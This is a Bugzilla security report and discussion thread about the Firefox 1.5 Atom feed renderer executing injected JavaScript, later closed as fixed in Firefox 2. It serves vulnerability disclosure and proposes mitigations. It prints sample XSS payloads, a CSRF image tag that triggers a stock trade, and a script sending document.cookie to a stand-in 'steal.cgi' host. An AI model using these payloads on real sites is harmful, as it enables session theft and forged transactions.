The default bug view has changed. See this FAQ.

Atom renderer allows script execution

RESOLVED WORKSFORME

Status

()

Firefox
RSS Discovery and Preview
RESOLVED WORKSFORME
11 years ago
11 years ago

People

(Reporter: SPI Labs, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

11 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Build Identifier: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

Greetings,

While researching vulnerabilities in popular RSS & Atom Web Clients, SPI Labs has discovered multiple 
issues within your product 'Firefox 1.5.0.4'. The Atom renderer allows an attacker to inject and execute 
JavaScript in the 'DIV' tag. This allows for 'Remote' zone/context execution. 

Example:

<div class="info" xmlns="http://www.w3.org/1999/xhtml">
<script>alert('Feed Div Class Tag')</script>
</div>



When a feed containing this script is presented to the user it will execute. Extensive 
testing of each tag was not performed and other fields may also be affected. 



Remote Zone Risks
When a reader is vulnerable in the remote zone you are substantially limited in what you can do, 
however there are still many things that can be done such as: 


Cross-site request forgery
An attacker can utilize cross-site request forgery (CSRF or XSRF) attacks in various ways to 
make your machine send requests to a website in order to possibly execute commands. For example: 

<img src="http://www.mystocktradersite.com/transaction.asp?sell=google&buy=Microsoft&numshares=1000">


Potential to Launch Attacks
Since attackers can send requests to other sites, they could potentially trick your browser into carrying out 
Web-based attacks on their behalf. These attacks could cause Denial of Service Conditions in the remote site, 
or if the site is vulnerable, execute commands on it. Here an attacker's advantage is that client IP will be logged 
and any resulting investigation by the victim may lead to them instead of to the attacker. 


Common approaches to dealing with this issue are as follows

* Disabling script execution during the web feed presentation phase
* Stripping out < and > characters, or not converting &lt; and &gt; for presentation

We tried emailing the security email address and received no responses so we're posting this here. Please let us know if you have any additional questions. 


Regards,

- SPI Labs
spilabs@spidynamics.com

Reproducible: Always

Steps to Reproduce:
1. Create an Atom feed
2. Insert the following into your div element

<script>alert('Feed Div Class Tag')</script>

3. View the feed with Firefox, or a Mozilla based browser

Actual Results:  
JavaScript is executed. You strip it in some places but not all.

Expected Results:  
Common approaches to dealing with this issue are as follows
* Disabling script execution during the web feed presentation phase
* Stripping out < and > characters, or not converting &lt; and &gt; for presentation
I'm sorry to be dense, but where is the vulnerability? What can this script do that ordinary script in a web page cannot? Does it run with chrome privileges or something?

> We tried emailing the security email address and received no responses so 
> we're posting this here.

Which address, exactly?

Gerv
(Reporter)

Comment 2

11 years ago
>> I'm sorry to be dense, but where is the vulnerability? What can this script >> do that ordinary script in a web page cannot? Does it run with chrome 
>> privileges or something?

As stated in the original posting we've discovered multiple applications affected by script injection in a web based feed, each having its own context limitations (Some even allowing file system access). Regarding chrome privileges this was not investigated and other concerns/issues may or may not exist. 

Let me address your question in two parts

#1
Web feed content may originate from blog postings, other feeds, P2P websites, or news entries. Depending on the site containing the feed an attacker may be able to steal cookies and send them to a third party host.

<script>
document.location='http://host/cgi-bin/steal.cgi' +document.cookie</script>
</script>


Firefox already strips out/disables script injection attempts in various locations within an atom feed, however not within the 'div' tags. In the example above you may be thinking 'why would someone try stealing cookies from themselves?'. Feeds may be created from other feeds, or direct user input. An attacker may post a blog entry with script and the website itself filters the tag injection, however the feed portion of it doesn't. The same goes for feeds creating feeds from other feeds.


#2
Even with script execution disabled it is still possible to perform CSRF (http://en.wikipedia.org/wiki/CSRF) due to atoms acceptance of html tags. There is no perfect solution regarding this 'ability'. A few suggestions

* Disable HTML tag insertion: This unfortunately removes functionality
* Conversion of <>() tags to their HTML entities (Again this removes html formatting functionality)
* Creation of a new setting allowing the user to toggle between 'html and/or script on and off' on the feed renderer and have this be turned 
  'off' by default. 



>> We tried emailing the security email address and received no responses so 
>> we're posting this here.
>
>Which address, exactly?

security@mozilla.org 

Please let us know if you have any additional questions

spilabs@spidynamics.com
In Firefox 1.5 these were treated as XML, and scripts are valid in XML. In Firefox 2 these are detected as feeds and no scripts are run.
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.